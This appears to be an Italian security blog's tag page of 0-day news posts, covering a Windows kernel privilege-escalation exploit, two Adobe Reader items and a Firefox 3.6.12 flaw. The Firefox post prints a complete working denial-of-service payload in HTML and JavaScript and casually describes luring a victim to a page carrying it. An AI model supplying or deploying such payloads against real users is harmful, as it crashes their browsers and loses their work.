Tag: 0 day

  • Guadagno di privilegi su quasi tutti i sistemi windows

    ATTENZIONE! NON fate test di buffer overflow del kernel su macchina di produzione o similari. I risultati sono IMPREVEDIBILI.

    p0wnbox ha pubblicato un exploit di una vulnerabilità del kernel di Windows (file win32k.sys) colpirebbe tutti i sistemi Windows.

    In questo caso viene sfruttato un problema strutturale della funzione RtlQueryRegistryValues delle API di Windows utilizzata per leggere più voci del registry con una sola chiamata. Le voci da interrogare vengono passate tramite una struttura uno dei cui campi, EntryContext, contiene un puntatore al buffer in cui mettere i risultati della voce relativa (si può specificare un buffer separato per ciascuna voce da interrogare). (altro…)

  • 0day di Mozilla Firefox 3.6.12

    <!--
    
    0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service
    
    Credits:
    Emanuele 'emgent' Gentili	<emgent@backtrack-linux.org>
    Marco 'white_sheep' Rondini	<white_sheep@backtrack-linux.org>
    Alessandro 'scox' Scoscia	<scox@backtrack.it>
    
    -->
    
    <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
    
    <script>
    var i=0;
    for (i=0;i<=19999;i++)
    {
    document.write("a");
    }
    
    for (i=0;i<=3;i++)
    {
    document.write(document.body.innerHTML);
    }
    
    </script>
    

    Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su cui gira.

    Basta, quindi, inserirlo in una pagina HTML, indurre qualcuno a visitare quella pagina e voilà gli avete bloccato Firefox, costringendolo a chiudere brutalmente il software e a perdere i riferimenti a tutti i tab aperti (ci sono persone che potrebbero uccidere per una perdita del genere attenzione!).

    Per ora si tratta solamente di un denial of service, non sono (ancora?) noti malware che sfruttano questo problema per altri scopi.

    Il problema è stato scoperto dal gruppo italiano Backtrack.

  • Aggiornamento per Acrobat

    Dopo quasi un mese dalla diffusione di  uno 0-day, Adobe rilascia finalmente un aggiornamento per il suo reader PDF, le cui versioni attuali diventano 9.4 e 8.2.5; le versioni precedenti non sono più supportate e dovrebbero essere aggiornate quanto prima.

    Se non si verificano altre emergenze, il prossimo aggiornamento del software è previsto per l’8 febbraio 2011.

  • Problema di sicurezza di Adobe Acrobat Reader

    Sta circolando almeno un documento PDF che sfrutta un problema 0-day di Acrobat Reader. Anche Adobe ha diramato un bollettino di sicurezza in cui classifica questo problema come critico.

    Tutte le versioni per tutte le piattaforme di Acrobat Reader presentano questo problema, nessuno escluso.

    In questo momento non ci sono azioni che possono risolvere questo problema, Adobe sta lavorando  per correggere l’errore e rilascerà probabilmente un aggiornamento quanto prima.

    Alcune mail che contengono il documento infetto che sfrutta questa vulnerabilità hanno come oggetto David Leadbetter’s One Point Lesson. Alcuni attacchi portati con questo vettore chiudono forzatamente Acrobat Reader e tentano di aprire un programma che fa da esca per l’utente.

    Alcuni antivirus riescono a classificare i PDF che sfruttano questa vulnerabilità  come sospetti; tuttavia è buona regola non aprire PDF di provenienza ignota con Acrobat Reader.